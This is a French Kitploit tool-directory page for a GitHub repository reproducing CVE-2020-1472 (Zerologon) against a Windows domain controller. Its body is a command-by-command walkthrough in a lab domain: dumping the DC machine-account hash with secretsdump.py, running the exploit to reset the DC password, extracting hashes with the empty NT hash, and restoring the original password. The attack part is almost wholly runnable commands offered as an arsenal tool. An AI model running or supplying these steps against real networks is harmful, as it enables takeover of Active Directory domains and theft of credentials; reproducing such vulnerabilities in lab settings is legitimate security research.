Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2020-1472 — CVE-2020-1472复现流程 | Kitploit
Outils/GitHubGitHub/naxg/cve-2020-1472
Password CrackingReconnaissanceVulnerability AnalysisExploitationPost-ExploitationPenetration Testing
GitHubnaxg/cve-2020-1472

CVE-2020-1472

CVE-2020-1472复现流程

Voir le dépôt
41il y a 5 ansPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

Après reproduction, il y a un petit bug : au redémarrage, l'écran de connexion reste long. Je ne sais pas si cela m'arrive uniquement à moi. (À utiliser avec prudence dans un environnement réel.)

En pratique, vous pouvez utiliser -use-vss et -history de secretsdump.py pour récupérer les hashs historiques.

Première étape

pip3 install -r requirements.txt

Voir le hash

secretsdump.py molecule-labs.com/administrator:[email protected] -just-dc-user 'AD$'

images

Attaque

python3 CVE-2020-1472.py AD AD$ 192.168.175.132

images

Rechercher le hash du contrôleur de domaine

secretsdump.py molecule-labs.com/'AD$'@192.168.175.132 -just-dc-user 'AD$' -hashes :31d6cfe0d16ae931b73c59d7e0c089c0

images

Restaurer le hash

python3 reinstall_original_pw.py AD 192.168.175.132 061e8e521872fa93a2f8d89ca0683145

images

Vérifier le hash restauré

secretsdump.py molecule-labs.com/administrator:[email protected] -just-dc-user 'AD$'

images

Source du script https://github.com/blackarrowsec/redteam-research

https://github.com/dirkjanm/CVE-2020-1472

https://github.com/SecuraBV/CVE-2020-1472

Télécharger l’outil